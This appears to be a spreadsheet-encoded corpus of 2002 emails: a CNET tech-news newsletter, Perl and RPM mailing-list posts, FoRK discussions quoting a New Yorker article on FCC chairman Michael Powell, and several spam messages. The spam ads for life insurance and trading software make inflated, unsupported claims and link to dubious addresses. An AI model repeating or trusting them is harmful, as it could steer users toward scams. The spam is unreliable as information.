 Apple Computer on Tuesday reported quarterly sales and earnings that matched analysts' lowered expectations as flat-panel iMac sales and sales to schools fell short of the company's initial hopes.
 The company earned $32 million, or 9 cents per share, on revenue of $1.43 billion. In the same quarter a year ago, Apple earned $61 million, or 17 cents per share, on revenue of $1.48 billion
 Analysts expected Apple to report earnings of 9 cents per share, according to First Call. Apple warned last month that sales would be in the range of $1.4 billion to $1.45 billion, down from an earlier estimate of $1.6 billion. The company said it expected earnings to be between 8 and 10 cents per share.
 &lt;br&gt;&lt;B&gt;APPLE COMPUTER INC 15.63 -12.49% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIDnqKb024YOLpk6Td6dR" &gt;HP, EMC storage systems to work better together &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 SAN FRANCISCO - Hewlett-Packard Co. and EMC Corp. said on Wednesday that they were opening up technology to each other in order to maker their storage systems work better together.
 However, the deal will not include technology from Hitachi Data Systems, which makes the hardware for HP's high-end storage system, an HP spokesman said.
 The deal follows close cooperation between storage heavyweight EMC and Compaq Computer Corp., which was acquired by HP in May.
 &lt;br&gt;&lt;B&gt;HEWLETT-PACKARD CO 13.57 -4.84%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href="http://clickthru.online.com/Click?q=6f-3x79IOLA6NgQWcf3RXvLF34ULXuR"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href="http://clickthru.online.com/Click?q=85-2G2oQ7KQokoqyyfaf70SVbToBBPR" &gt;Investec Inc. stays bullish on Intel in report 7/17/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analysts Eric Ross and Sam Chang reiterate a "strong buy" rating on the computer chip giant after it reports second-quarter earnings below the consensus Wall Street estimate. Ross and Chang expect a modest seasonal increase in demand in the second half of this year, with strength in consumer laptop buying. Calling Intel the premier semiconductor firm, they suggest the stock is a bargain.
 &lt;br&gt;&lt;B&gt;INTEL CORP 19.44 5.88% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJXwwVLFigi7yr9FKgnR"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href="http://clickthru.online.com/Click?q=af--dB8QLpqyARxhm1ydDX7NdmUVSeR" &gt;AT&amp;T names Dorman chairman, succeeding Armstrong &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 NEW YORK - AT&amp;T Corp. said on Wednesday its president, David Dorman, will succeed C. Michael Armstrong as chairman and chief executive officer when the nation's largest telephone company sells its cable-television business to Comcast Corp.
 Dorman's appointment, which was widely expected, will become effective once the sale of AT&amp;T Broadband closes later this year.
 &lt;br&gt;&lt;B&gt;AT&amp;T CORP 10.45 2.55% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvkFUNjdkHF6q-jPexAyR"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href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkII70Pie23s1N87hJlR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4WqjRN0QzbMuLbLad4R"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href="http://clickthru.online.com/Click?q=03-13t3I3rzdpDImCshKQcaLlAI6OrR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qUUmkwKzTiMEyR1N675iR"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href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcr3whczVdngyV7VDjSPR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW1Ygllx9Z5VKc-3P0BcR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQruttNYjKHbtbXYzHRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0tYv2AN7Bc1bJBykEmZR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14anJEXR6gJLkjCXMZHnR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1B4QRK963V0z6qjySJGeR"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href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKe1nDZCddWfGJ0kSyVjyR"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href="http://clickthru.online.com/Click?q=c1-PIljQpWqZilFTh5wiOPYOLipujlR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdLapk4BZnOIRzw0LGkk4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=ec-MHlXray63gw5uez9kqBAYENOGKW989RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5WFjPUvurMPGPxZ6RlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOFD6WgDblRuaBDxRU4R"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href="http://clickthru.online.com/Click?q=2b-2FVYINzsUbvwIJkwzk0xBfd-8WrR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8VvxEmadeVXCHnpqL0wRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8NOicklnqm86ccJ_2d2ZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiBYrYvZOzceCGFySNP8dR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIP6Rb3txkD9IO3JewkhBpuR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=94-rOVNQaI7VuMAb3HJ5elUjfr5JQyR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=aa-gBae-hUc1C0VlLsnEUuZc5HbsRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Low Cost Life Insurance -- FREE Quote pnmkf
</t>
  </si>
  <si>
    <t xml:space="preserve">Low-Cost Term-Life Insurance!
 SAVE up to 70% or more on your term life insurance policy now.
 Male age 40 - $250,000 - 10 year level term - as low as $11 per month.
 CLICK HERE NOW For your FREE Quote!
  http://211.78.96.242/insurance/
 If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
 We offer the lowest rates available from nationally recognized carriers.
 Act now and pay less!
 CLICK HERE 
  http://211.78.96.242/insurance/
 ++++++++++++++++++++++++++++
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://211.78.96.242/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I Can't Wait Anymore!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE ONLINE TRADER TRAINING!
</t>
  </si>
  <si>
    <t xml:space="preserve">Learn from the BEST...for FREE! 
 Learn to locate the markets that will make you money. 
 You'll learn how to find and track both stocks and 
 commodities with our FREE software. There's more... 
 We'll also give you 90 days' worth of FREE expert 
 training in the use of our software. 
 Once you're comfortable, your first five trades are 
 also free - NO FEES! We have the system that has 
 returned profits, and you can have your own personal
 consultant - FREE customer service for a full 90 days 
 to help you learn how to work from home with our free 
 software. 
 Simply click below for more details and to request 
 your free software: 
 http://www.page4life.org/users/invest20/invest/trade.html
 To be removed from any future mailings, please visit
 this page:
 http://www.page4life.org/users/invest20/invest/cleanlist.html
 7593AVEx4-349vjkA2882cneQ0-78l27
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-27
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * This Week on perl5-porters (19-25 August 2002)
     * Slashdot Taking Questions to Ask Larry Wall
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (19-25 August 2002)                     |
 |   posted by rafael on Monday August 26, @07:42 (summaries)         |
 |   http://use.perl.org/article.pl?sid=02/08/26/1154225              |
 +--------------------------------------------------------------------+
 I guess those thunderstorms came. And how they came. From an even wetter
 than normal country on the shores of the North Sea, comes this weeks
 perl5-porters summary.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/08/26/1154225
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/26/1154225
 +--------------------------------------------------------------------+
 | Slashdot Taking Questions to Ask Larry Wall                        |
 |   posted by pudge on Monday August 26, @14:41 (perl6)              |
 |   http://use.perl.org/article.pl?sid=02/08/26/1845224              |
 +--------------------------------------------------------------------+
 Please, if you feel inclined, make sure some [0]reasonable questions are
 asked of him.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/26/1845224
 Links:
     0. http://interviews.slashdot.org/article.pl?sid=02/08/25/236217&amp;tid=145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</si>
  <si>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Re: [zzzzteana] RE: Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, I know a guy that split up from her that wrote Harry Potter.
 Though he is doing fine.
 I was offered a film part as a shot up gangster, but turned it down.
 Seemed good to me, ultra violence and working with nice people.
 Meant a week in Prague, in Feb, bj scene, old lady going ballistic if I went
 there.
 Apparantly my bits belong to her...
 Damn.
 Never been in a straight to video before!!!!
 So they are currently thinking of cutting out the sex scene on my bit.
 They want me as menacing though.
 Which is nice.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: xine src packge still gives errors
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :
 &gt; RPM build errors:
 &gt;     user dude does not exist - using root
 &gt;     user dude does not exist - using root
 &gt;     user dude does not exist - using root
 &gt;     user dude does not exist - using root
 &gt;     user dude does not exist - using root
 This I would guess is normal, but don't you get it at the very beginning of
 the build? Isn't this at the end just a reminder?
 &gt;     File not found: /var/tmp/xine-root/usr/bin/aaxine
 Argh, I forgot to exclude aaxine from the %files when using "--without
 aalib" :-(
 The current "fr6.1" spec file fixes this...
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.02 0.03 0.00
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, chris arkenberg wrote:
 &gt; Perhaps people are starting to notice how profit motive drains the
 &gt; meaning out of their lives. Kinda sucks to be an ant farming for the
 &gt; corporate lords. Funny how most of the rest of the world is more and
 &gt; more apprehensive towards American Democracy.
 Drains what? My wallet you mean? America _is_ greed, that's who and what we
 are.
 &gt; I just went to DC for the first time. I was awestruck by the
 &gt; monuments, the words of Thomas Jefferson, the Spirit of Democracy set
 &gt; in stone. Amazing to think that in little more than 200 years our
 &gt; government could be so far removed from those honorable principles.
 &gt; Adam Smith presumed that the marketplace would regulate itself
 &gt; through morality, good faith, and responsibility.
 Those old white dudes could never see a world that wasnt ALL deeply
 religeous (science wasnt up to speed yet). How could you not hold these
 principles as just how you should act? They got that religeon and government
 should not be the same thing, they didnt get that when society doesnt have
 any beliefs are all (capitalism is more atheist then communism ever was) it
 quickly goes to hell as some people have 100 billion and all the rest have
 too dolla a day.
 Having been raised in a generally ethical way, it was a big jump to learn to
 run a business. Lots of lessions in being ruthless, and a few about being
 sure to hire large Italians to do debt collection (it works!).
 &gt; Corporate America seems to feel that those principles stand in the way
 &gt; of making the real bucks.
 No shit, really? Seriously, if you're not all about screwing over the
 customer, there is no place for you in the ruling class, and you certainly
 cant play the American game.
 &gt; Ah, socialized medicine. Siestas. 6 week vacation leave. I hear Spain is
 &gt; nice this time of year...
 That's living, here we only work, buy, and work more to buy more, like rats
 on a wheel. I can't wait to be rich enough to move somewhere nice, if they
 will let me get out alive that is.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Lord of the Ringtones: Arbocks vs. Seelecks
</t>
  </si>
  <si>
    <t xml:space="preserve">I got to see Powell talk in March 2001 at the beginning of his
 reign at the FCC.  He said they were going to take a real
 hands off approach, so it's funny that they would blame
 the regulators for causing the collapse.  One thing he did
 get right, is that he wasn't worried that the US was behind
 Europe in the wireless licensing spectrum.  This is something
 very prescient in that most of those licensors have had to
 eat their lunch over the huge licensing costs they paid for
 very little benefit.  His legacy was/is supposed to be
 rethinking the FCC's role to stay out of the way in this
 period of business innovation in the wireless space as he
 didn't want the government forcing business models onto
 the private sector.
 His full transcript is here [1].  Interestingly enough I
 got to see his speech in person as he was part of the whole
 CTIA'2001 Las Vegas keynote series of speakers.  Clay and
 I hoped a flight out of Ontario to Las Vegas to do demo support
 for Craig Barrett [2].  His message was that there's no difference
 between wired and wireless Internet--it's all the same thing.
 Instead of scalable networks, we should be thinking about scalable
 content (&amp; using Magi he showed sending a blue man tv commercial
 from a desktop to a laptop to an ipaq to a color smartphone with
 the content scaling back for each target platform).
 The best part of the whole trip wasn't hobnobbing at all,
 but really the fact that the Venetian had ran out of rooms.
 They decided to put us up in one of their $10,000/night high
 roller rooms.  They put Clay in one and me in another.
 The Venetian is known for having the largest hotel rooms
 anywhere, but these ones were bigger than my whole house. 8-)
 Greg
 [1] http://www.fcc.gov/Speeches/Powell/2001/spmkp101.html
 [2] http://www.intel.com/pressroom/archive/speeches/cb20010320.htm
 Rohit Khare wrote:
 &gt; I can't believe I actually read a laugh-out-loud funny profile of the 
 &gt; *FCC Commissioner* fer crissakes! So the following article comes 
 &gt; recommended, a fine explanation of Michael Powell's extraordinary 
 &gt; equivocation.
 &gt; 
 &gt; On the other hand, I can also agree with Werbach's Werblog entry... Rohit
 &gt; 
 &gt;&gt; A Trip to F.C.C. World
 &gt;&gt;
 &gt;&gt; Nicholas Lemann has a piece in the New Yorker this week about FCC 
 &gt;&gt; Chairman Michael Powell.  It's one of the first articles I've seen 
 &gt;&gt; that captures some of Powell's real personality, and the way he's 
 &gt;&gt; viewed in Washington.  Unfortunately, Lemann ends by endorsing 
 &gt;&gt; conventional political wisdom.  After describing how Powell isn't 
 &gt;&gt; really a fire-breathing ideological conservative, he concludes that, 
 &gt;&gt; in essence, Powell favors the inumbent local Bell telephone companies, 
 &gt;&gt; while a Democratic FCC would favor new entrants.  I know that's not 
 &gt;&gt; how Powell sees the world, and though I disagree with him on many 
 &gt;&gt; issues, I think he's right to resist the old dichotomy.
 &gt;&gt;
 &gt;&gt; The telecom collapse should be a humbling experience for anyone who 
 &gt;&gt; went through it.  The disaster wasn't the regulators' fault, as some 
 &gt;&gt; conservatives argue.  But something clearly went horribly wrong, and 
 &gt;&gt; policy-makers should learn from that experience.  Contrary to Lemann's 
 &gt;&gt; speculation, the upstart carriers won't be successful in a Gore 
 &gt;&gt; administration, because it's too late.  Virtually all of them are 
 &gt;&gt; dead, and Wall Street has turned off the capital tap for the 
 &gt;&gt; foreseeable future.  Some may survive, but as small players rather 
 &gt;&gt; than world-dominators. 
 &gt;&gt;
 &gt;&gt; The battle between CLECs and RBOCs that Lemann so astutely parodies is 
 &gt;&gt; old news.  The next important battle in telecom will be between those 
 &gt;&gt; who want to stay within the traditional boxes, and those who use 
 &gt;&gt; different models entirely.  That's why open broadband networks and 
 &gt;&gt; open spectrum are so important.  Whatever the regulatory environment, 
 &gt;&gt; there is going to be consolidation in telecom.  Those left out in that 
 &gt;&gt; consolidation will face increasing pressure to create new pipes into 
 &gt;&gt; the home, or slowly die. The victors in the consolidation game will 
 &gt;&gt; cut back on innovation and raise prices, which will create further 
 &gt;&gt; pressure for alternatives. 
 &gt;&gt;
 &gt;&gt; Lemann is right that policy-making looks much drier and more ambiguous 
 &gt;&gt; on the ground than through the lens of history.  But he's wrong in 
 &gt;&gt; thinking that telecom's future will be something like its past.
 &gt;&gt;
 &gt;&gt; Friday, October 04, 2002
 &gt;&gt; 11:17:11 AM  comments {0} 
 &gt; 
 &gt; 
 &gt; ==============================================================
 &gt; http://www.newyorker.com/printable/?fact/021007fa_fact
 &gt; 
 &gt; THE CHAIRMAN   
 &gt; by NICHOLAS LEMANN
 &gt; He's the other Powell, and no one is sure what he's up to.
 &gt; New Yorker, October 8, 2002
 &gt; 
 &gt; Last year, my middle son, in eighth grade and encountering his first 
 &gt; fairly serious American-history course, indignantly reported that the 
 &gt; whole subject was incomprehensible. I was shocked. What about Gettysburg 
 &gt; and the Declaration of Independence and the Selma-to-Montgomery march? 
 &gt; Just look at my textbook, he said, and when I did I saw his point. His 
 &gt; class had got up to the eighteen-forties. What I expected was a big 
 &gt; beefing up of the roles of Sacagawea and Crispus Attucks, and, in-deed, 
 &gt; there was some of that. But the main difference between my son's text 
 &gt; and that of my own childhood was that somebody had made the disastrous 
 &gt; decision to devote most of it to what had actually happened in American 
 &gt; history. There were pages and pages on tariffs and bank charters and 
 &gt; reciprocal trade agreements. I skipped ahead, past the Civil War, hoping 
 &gt; for easier going, only to encounter currency floats and the regulation 
 &gt; of freight rates. Only a few decades into the twentieth century did it 
 &gt; become possible to see the federal government's main function as 
 &gt; responding to dramatic crises and launching crusades for social justice, 
 &gt; instead of attempting to referee competing claims from economic interests.
 &gt; 
 &gt; Even now, if one were to reveal what really goes on behind the pretty 
 &gt; speeches and the sanctimonious hearings in Washington, what you'd find 
 &gt; is thousands of lawyers and lobbyists madly vying for advantage, not so 
 &gt; much over the public as over each other: agribusiness versus real 
 &gt; estate, banks versus insurance companies, and so on. The arena in which 
 &gt; this competition mainly takes place is regulatory agencies and 
 &gt; commissions and the congressional committees that supervise them. It's 
 &gt; an insider's game, less because the players are secretive than because 
 &gt; the public and the pressencouraged by the players, who speak in jargon
 &gt; can't get themselves interested.
 &gt; 
 &gt; One corner of Washington might be called F.C.C. World, for the Federal 
 &gt; Communications Commission. F.C.C. World has perhaps five thousand 
 &gt; denizens. They work at the commission itself, at the House and Senate 
 &gt; commerce committees, and at the Washington offices of the companies that 
 &gt; the commission regulates. They read Communications Daily (subscription 
 &gt; price: $3,695 a year), and every year around Christmastime they 
 &gt; grumblingly attend the Chairman's Dinner, at a Washington hotel, where 
 &gt; the high point of the evening is a scripted, supposedly self-deprecating 
 &gt; comedy routine by the commission's chairman.
 &gt; 
 &gt; Of all the federal agencies and commissions, the F.C.C. is the one that 
 &gt; Americans ought to be most interested in; after all, it is involved with 
 &gt; a business sector that accounts for about fifteen per cent of the 
 &gt; American economy, as well as important aspects of daily lifetelephone 
 &gt; and television and radio and newspapers and the Internet. And right now 
 &gt; F.C.C. World is in, if not a crisis, at least a very soapy lather, 
 &gt; because a good portion of what the angry public thinks of as the 
 &gt; "corporate scandals" concerns the economic collapse of companies 
 &gt; regulated by the F.C.C. Qwest, WorldCom, Adelphia, and Global Crossing, 
 &gt; among others, are (or were) part of F.C.C. World. AOL Time Warner is 
 &gt; part of F.C.C. World. Jack Grubman, the former Salomon Smith Barney 
 &gt; analyst who seems to have succeeded Kenneth Lay, of Enron, as the 
 &gt; embodiment of the corporate scandals, is part of F.C.C. World. In the 
 &gt; past two years, companies belonging to F.C.C. World have lost trillions 
 &gt; of dollars in stock-market valuation, and have collectively served as a 
 &gt; dead weight pulling down the entire stock market.
 &gt; 
 &gt; This year, an alarmed and acerbic anonymous memorandum about the state 
 &gt; of the F.C.C. has been circulating widely within F.C.C. World. It evokes 
 &gt; F.C.C. World's feverish mood ("The F.C.C. is fiddling while Rome burns") 
 &gt; and suggests why nobody besides residents of F.C.C. World has thought of 
 &gt; the commission in connection with the corporate scandals. The sentence I 
 &gt; just quoted is followed by this explanation: "The ILECs appear likely to 
 &gt; enter all l.d. markets within twelve months, while losing virtually no 
 &gt; residential customers to attackers since 1996, and suffering about 10% 
 &gt; market share loss in business lines to CLECs." It's a lot easier to 
 &gt; think about evil C.E.O.s than to decipher that.
 &gt; 
 &gt; 
 &gt; Even in good times, F.C.C. World pays obsessive attention to the 
 &gt; commission's chairman. In bad times, the attention becomes especially 
 &gt; intense; and when the chairman is a celebrity F.C.C. World devotes 
 &gt; itself to full-time chairman-watching. The current chairman, Michael 
 &gt; Powell, is a celebrity, at least by government-official standards, 
 &gt; because he is the only son of Colin Powell, the Secretary of State. 
 &gt; Unlike his father, he has a kind of mesmerizing ambiguity, which 
 &gt; generates enormous, and at times apoplectically toned, speculation about 
 &gt; who he really is and what he's really up to. Powell is young to be the 
 &gt; head of a federal agencyhe is thirty-nineand genially charming. 
 &gt; Everybody likes him. Before becoming chairman, he was for three years 
 &gt; one of the F.C.C.'s five commissioners; not only is he fluent in the 
 &gt; F.C.C.'s incomprehensible patois, he has a Clintonesque love of the 
 &gt; arcane details of communications policy. He's always saying that he's an 
 &gt; "avid moderate." And yet he has a rage-inciting quality. One of his 
 &gt; predecessors as chairman, Reed Hundt, quoted in Forbes, compared Powell 
 &gt; to Herbert Hoover. Mark Cooper, of the Consumer Federation of America, 
 &gt; calls him "radical and extreme." Just as often as he's accused of being 
 &gt; a right-wing ideologue, Powell gets accused of being paralytically 
 &gt; cautious. "It ain't about singing 'Kum-Ba-Yah' around the campfire," 
 &gt; another former chairman, William Kennard, says. "You have to have an 
 &gt; answer." One day last spring, Powell, testifying before a Senate 
 &gt; subcommittee, delivered an anodyne opening statement, and the 
 &gt; subcommittee's chairman, Ernest Hollings, of South Carolina, berated 
 &gt; him. "You don't care about these regulations," Hollings said. "You don't 
 &gt; care about the law or what Congress sets down. . . . That's the 
 &gt; fundamental. That's the misgiving I have of your administration over 
 &gt; there. It just is amazing to me. You just pell-mell down the road and 
 &gt; seem to not care at all. I think you'd be a wonderful executive 
 &gt; vice-president of a chamber of commerce, but not a chairman of a 
 &gt; regulatory commission at the government level. Are you happy in your job?"
 &gt; 
 &gt; "Extremely," Powell said, with an amiable smile.
 &gt; 
 &gt; 
 &gt; One cannot understand Powell's maddening effect, at least on Democrats 
 &gt; and liberal activists, without understanding not just the stated purpose 
 &gt; of the commission he chairs but also its real purpose. The F.C.C. was 
 &gt; created by Congress in 1934, but it existed in prototype well before the 
 &gt; New Deal, because it performs a function that is one of the classic easy 
 &gt; cases for government intervention in the private economy: making sure 
 &gt; that broadcasters stick to their assigned spots on the airwaves. Its 
 &gt; other original function was preventing American Telephone &amp; Telegraph, 
 &gt; the national monopoly phone company, from treating its customers 
 &gt; unfairly. Over the decades, as F.C.C. World grew up into a comfortable, 
 &gt; well-established place, the F.C.C. segued into the role of industrial 
 &gt; supervisionits real purpose. It was supposed to manage the competition 
 &gt; among communications companies so that it didn't become too bloody, by 
 &gt; artfully deciding who would be allowed to enter what line of business. 
 &gt; In addition to looking out for the public's interest, the commission 
 &gt; more specifically protected the interests of members of Congress, many 
 &gt; of whom regard the media companies in their districts as the single most 
 &gt; terrifying category of interest groupyou can cross the local bank 
 &gt; president and live to tell the tale, but not the local broadcaster. 
 &gt; According to an oft-told F.C.C. World anecdote, President Clinton once 
 &gt; blocked an attempt to allow television stations to buy daily newspapers 
 &gt; in the same city because, he said, if the so-and-so who owned the 
 &gt; anti-Clinton Little Rock Democrat-Gazette had owned the leading TV 
 &gt; station in Little Rock, too, Clinton would never have become President.
 &gt; 
 &gt; 
 &gt; F.C.C. World may have been con tentious, but it was settled, too, 
 &gt; because all the reasonably powerful players had created secure economic 
 &gt; niches for themselves. Then, in the nineteen-eighties, the successful 
 &gt; breakup of A.T. &amp; T.by far the biggest and most important company the 
 &gt; commission regulateddeposited a thick additional sediment of 
 &gt; self-confidence onto the consciousness of F.C.C. World. A generation 
 &gt; ago, for most Americans, there was one local phone company, one 
 &gt; long-distance company, and one company that manufactured telephones, 
 &gt; which customers were not permitted to ownand they were all the same 
 &gt; company. It was illegal to plug any device into a phone line. By the 
 &gt; mid-nineteen-nineties, there were a dozen economically viable local 
 &gt; phone companies, a handful of national long-distance companies competing 
 &gt; to offer customers the lowest price and best service, and stores 
 &gt; everywhere selling telephone equipment from many manufacturersand 
 &gt; millions of Americans had a fax machine and a modem operating over the 
 &gt; telephone lines. A.T. &amp; T. had argued for years that it was a "natural 
 &gt; monopoly," requiring protection from economic competition and total 
 &gt; control over its lines. So much for that argument. Over the same period, 
 &gt; the F.C.C. had assisted in the birth of cable television and cell phones 
 &gt; and the Internet. It was the dream of federal-agency success come true: 
 &gt; consumers vastly better served, and the industry much bigger and more 
 &gt; prosperous, too.
 &gt; 
 &gt; The next big step was supposed to be the Telecommunications Act of 1996, 
 &gt; one of those massive, endlessly lobbied-over pieces of legislation which 
 &gt; most people outside F.C.C. World probably felt it was safe to ignore. 
 &gt; Although the Telecom Act sailed under the rhetorical banner of 
 &gt; modernization and deregulation, its essence was a grand interest-group 
 &gt; bargain, in which the local phone companies, known to headline writers 
 &gt; as "baby Bells" and to F.C.C. World as "arbocks" (the pronounced version 
 &gt; of RBOCs, or regional Bell operating companies), would be permitted to 
 &gt; offer long-distance service in exchange for letting the long-distance 
 &gt; companies and smaller new phone companies use their lines to compete for 
 &gt; customers. Consumers would win, because for the first time they would 
 &gt; get the benefits of competition in local service while getting even more 
 &gt; competition than they already had in long distance. But the politics and 
 &gt; economics of the Telecom Act (which was shepherded through Congress by 
 &gt; Vice-President Gore) were just as important. Democrats saw the act as 
 &gt; helping to reposition them as the technology partythe party that 
 &gt; brought the Internet into every home, created hundreds of thousands of 
 &gt; jobs in new companies, and, not least, set off an investment boom whose 
 &gt; beneficiaries might become the party's new contributor base. Clinton's 
 &gt; slogans about the "information superhighway" and "building a bridge to 
 &gt; the twenty-first century," which, like all Clinton slogans, artfully 
 &gt; sent different messages to different constituencies, were the rhetorical 
 &gt; correlates of the Telecom Act, and Gore's cruise to the Presidency was 
 &gt; supposed to be powered substantially by the act's success.
 &gt; 
 &gt; The F.C.C. had a crucial role in all this. The arbocks are rich, 
 &gt; aggressive, politically powerful, and generally Republican (though like 
 &gt; all important interest groups they work with both parties); they 
 &gt; immediately filed lawsuits, which wound up tying the hands of their new 
 &gt; competitors in the local phone market for more than three years. Through 
 &gt; rule-making, enforcement, and litigation, the F.C.C., then headed by 
 &gt; Reed Hundt, who was Gore's classmate at St. Albans, was supposed to keep 
 &gt; the arbocks in their cages, so that not only long-distance companies 
 &gt; like A.T. &amp; T. and MCI WorldCom but also a whole category of new 
 &gt; companies, "see-lecks" (the pronounced version of CLECs, or competitive 
 &gt; local exchange carriers), could emerge. This entailed the regulatory 
 &gt; equivalent of hand-to-hand combat: the see-leck is supposed to have 
 &gt; access to the arbock's switching equipment, the arbock won't give the 
